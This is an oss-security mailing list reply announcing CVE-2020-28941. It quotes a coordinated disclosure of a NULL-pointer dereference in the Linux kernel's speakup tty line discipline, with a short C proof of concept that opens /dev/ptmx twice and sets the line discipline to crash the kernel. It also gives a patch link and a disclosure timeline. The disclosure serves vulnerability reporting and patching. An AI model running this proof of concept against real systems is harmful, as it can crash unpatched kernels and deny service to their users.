Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Thu, 19 Nov 2020 17:25:08 +0100
From: Marcus Meissner <meissner@...e.de>
To: oss-security@...ts.openwall.com
Cc: nopitydays@...il.com
Subject: Re: Linux kernel NULL-ptr deref bug in
 spk_ttyio_ldisc_close

Hi,

Mitre has assigned CVE-2020-28941 to this issue.

Ciao, Marcus
On Thu, Nov 19, 2020 at 10:46:59AM +0800, Shisong Qin wrote:
> Hi,
> 
> Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
> Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
> function spk_ttyio_ldisc_close, it would free the "speakup_tty->disc_data"
> and set "speakup_tty" to NULL. However, if we open two tty device and use
> tiocsetd() to set them as "speakup_tty" and close them in turn, the first
> close would set "speakup_tty" to NULL, and in the second close would try to
> dereference the "speakup_tty", leading to a NULL-ptr deref crash.
> 
> This bug could be reproduced in the longterm 4.19 Linux kernel with
> CONFIG_STAGING=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y.
> To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
> required in config, and here is a simple poc:
> 
> #define _GNU_SOURCE
> 
> #include <dirent.h>
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <signal.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/prctl.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <time.h>
> #include <unistd.h>
> 
> int main(void) {
>     int disc = 0x1a;
>     int fd = open("/dev/ptmx", O_RDWR, 0);
>     ioctl(fd, 0x5423, &disc);
>     int fd2 = open("/dev/ptmx", O_RDWR, 0);
>     ioctl(fd2, 0x5423, &disc);
>     return 0;
> }
> 
> After the process return, it seems the automated calling to release would
> trigger the NULL-ptr deref bug.
> 
> Here is the commit to patch this BUG:
> https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=d4122754442799187d5d537a9c039a49a67e57f1
> 
> Timeline:
> * 2020/11/10 - Vulnerability reported to security@...nel.org
> * 2020/11/11 - Vulnerability confirmed, and reported to
> linux-distros@...openwall.org.
> * 2020/11/19 - Vulnerability opened.
> 
> Thanks,
> Shisong Qin and Bodong Zhao, Tsinghua University

-- 
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <meissner@...e.de>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.